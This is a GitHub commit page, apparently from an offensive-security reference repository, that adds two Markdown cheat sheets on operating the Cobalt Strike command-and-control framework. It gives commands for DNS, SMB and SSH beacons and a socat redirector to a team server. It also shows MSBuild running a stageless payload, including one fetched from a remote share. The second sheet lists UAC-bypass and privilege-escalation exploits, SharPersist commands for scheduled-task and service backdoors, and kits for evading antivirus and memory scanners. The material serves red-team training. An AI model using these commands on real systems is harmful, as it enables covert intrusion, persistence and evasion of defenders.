-
-
Notifications
You must be signed in to change notification settings - Fork 249
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
d0f0d28
commit 235dcaf
Showing
9 changed files
with
301 additions
and
210 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,120 @@ | ||
| # Cobalt Strike - Beacons | ||
|
|
||
| ## DNS Beacon | ||
|
|
||
| ### DNS Configuration | ||
|
|
||
| * Edit the `Zone File` for the domain | ||
| * Create an `A record` for Cobalt Strike system | ||
| * Create an `NS record` that points to FQDN of your Cobalt Strike system | ||
|
|
||
| Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a `DNS A` record and point it to your Cobalt Strike team server. Use `DNS NS` records to delegate several domains or sub-domains to your Cobalt Strike team server's `A` record. | ||
|
|
||
|
|
||
| Example of DNS on Digital Ocean: | ||
|
|
||
| ```powershell | ||
| NS example.com directs to 10.10.10.10. 86400 | ||
| NS polling.campaigns.example.com directs to campaigns.example.com. 3600 | ||
| A campaigns.example.com directs to 10.10.10.10 3600 | ||
| ``` | ||
|
|
||
| After creating a DNS listener (`Beacon DNS`), verify that your domains resolve to `0.0.0.0` | ||
|
|
||
| * `nslookup jibberish.beacon polling.campaigns.domain.com` | ||
| * `nslookup jibberish.beacon campaigns.domain.com` | ||
|
|
||
| If you have trouble with DNS, you can restart the `systemd` service and force Google DNS nameservers. | ||
|
|
||
| ```powershell | ||
| systemctl disable systemd-resolved | ||
| systemctl stop systemd-resolved | ||
| rm /etc/resolv.conf | ||
| echo "nameserver 8.8.8.8" > /etc/resolv.conf | ||
| echo "nameserver 8.8.4.4" >> /etc/resolv.conf | ||
| ``` | ||
|
|
||
|
|
||
| ### DNS Redirector | ||
|
|
||
| ```ps1 | ||
| socat -T 1 udp4-listen:53,fork udp4:teamserver.example.net:53 | ||
| ``` | ||
|
|
||
| Debug the DNS queries with `tcpdump -l -n -s 5655 -i eth0 udp port 53`. | ||
|
|
||
|
|
||
| ### DNS Mode | ||
|
|
||
| | Mode | Description | | ||
| | --- | --- | | ||
| | `mode dns-txt` | DNS TXT record data channel (default) | | ||
| | `mode dns` | DNS A record data channel | | ||
| | `mode dns6` | DNS AAAA record channel | | ||
|
|
||
|
|
||
| ## SMB Beacon | ||
|
|
||
| ```powershell | ||
| link [host] [pipename] | ||
| connect [host] [port] | ||
| unlink [host] [PID] | ||
| jump [exec] [host] [pipe] | ||
| ``` | ||
|
|
||
| SMB Beacon uses Named Pipes. You might encounter these error code while running it. | ||
|
|
||
| | Error Code | Meaning | Description | | ||
| |------------|----------------------|----------------------------------------------------| | ||
| | 2 | File Not Found | There is no beacon for you to link to | | ||
| | 5 | Access is denied | Invalid credentials or you don't have permission | | ||
| | 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. | | ||
|
|
||
|
|
||
| ## SSH Beacon | ||
|
|
||
| ```powershell | ||
| # deploy a beacon | ||
| beacon> help ssh | ||
| Use: ssh [target:port] [user] [pass] | ||
| Spawn an SSH client and attempt to login to the specified target | ||
| beacon> help ssh-key | ||
| Use: ssh [target:port] [user] [/path/to/key.pem] | ||
| Spawn an SSH client and attempt to login to the specified target | ||
| # beacon's commands | ||
| upload Upload a file | ||
| download Download a file | ||
| socks Start SOCKS4a server to relay traffic | ||
| sudo Run a command via sudo | ||
| rportfwd Setup a reverse port forward | ||
| shell Execute a command via the shell | ||
| ``` | ||
|
|
||
|
|
||
| ## Metasploit compatibility | ||
|
|
||
| * Payload: `windows/meterpreter/reverse_http or windows/meterpreter/reverse_https` | ||
| * Set `LHOST` and `LPORT` to the beacon | ||
| * Set `DisablePayloadHandler` to `True` | ||
| * Set `PrependMigrate` to `True` | ||
| * `exploit -j` | ||
|
|
||
|
|
||
| ## Custom Payloads | ||
|
|
||
| ```powershell | ||
| * Attacks > Packages > Payload Generator | ||
| * Attacks > Packages > Scripted Web Delivery (S) | ||
| $ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor | ||
| $ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml | ||
| $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml | ||
| ``` | ||
|
|
||
|
|
||
| ## References | ||
|
|
||
| * [Cobalt Strike > User Guide > DNS Beacon](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/listener-infrastructue_beacon-dns.htm) | ||
| * [Simple DNS Redirectors for Cobalt Strike - Thursday 11 March, 2021](https://www.cobaltstrike.com/blog/simple-dns-redirectors-for-cobalt-strike) | ||
| * [CobaltStrike DNS Beacon Lab Setup - rioasmara - March 18, 2023](https://rioasmara.com/2023/03/18/cobaltstrike-dns-beacon-lab-setup/) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,104 @@ | ||
| # Cobalt Strike - Kits | ||
|
|
||
| * [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike | ||
|
|
||
| ## Elevate Kit | ||
|
|
||
| UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018) | ||
|
|
||
| ```powershell | ||
| beacon> runasadmin | ||
| Beacon Command Elevators | ||
| ======================== | ||
| Exploit Description | ||
| ------- ----------- | ||
| ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113) | ||
| ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701) | ||
| ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051) | ||
| svc-exe Get SYSTEM via an executable run as a service | ||
| uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup) | ||
| uac-token-duplication Bypass UAC with Token Duplication | ||
| ``` | ||
|
|
||
| ## Persistence Kit | ||
|
|
||
| * https://github.com/0xthirteen/MoveKit | ||
| * https://github.com/fireeye/SharPersist | ||
| ```powershell | ||
| # List persistences | ||
| SharPersist -t schtaskbackdoor -m list | ||
| SharPersist -t startupfolder -m list | ||
| SharPersist -t schtask -m list | ||
| # Add a persistence | ||
| SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add | ||
| SharPersist -t schtaskbackdoor -n "Something Cool" -m remove | ||
| SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add | ||
| SharPersist -t service -n "Some Service" -m remove | ||
| SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add | ||
| SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly | ||
| SharPersist -t schtask -n "Some Task" -m remove | ||
| ``` | ||
| ## Resource Kit | ||
| > The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows | ||
| ## Artifact Kit | ||
| > Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder. | ||
| Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : | ||
| - Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)` | ||
| - Install the dependencies : `sudo apt-get install mingw-w64` | ||
| - Edit the Artifact code | ||
| * Change pipename strings | ||
| * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc | ||
| * Change Import | ||
| - Build the Artifact | ||
| - Cobalt Strike -> Script Manager > Load .cna | ||
| ## Mimikatz Kit | ||
| * Download and extract the .tgz from the Arsenal | ||
| * Load the mimikatz.cna aggressor script | ||
| * Use mimikatz functions as normal | ||
| ## Sleep Mask Kit | ||
| > The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. | ||
| Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. | ||
| ## Mutator Kit | ||
| > The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities. | ||
| The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`. | ||
| ```ps1 | ||
| OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll | ||
| mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c | ||
| ``` | ||
|
|
||
|
|
||
| ## Thread Stack Spoofer | ||
|
|
||
| > An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. | ||
| Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. | ||
|
|
||
|
|
||
| ## References | ||
|
|
||
| * [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm) |
Oops, something went wrong.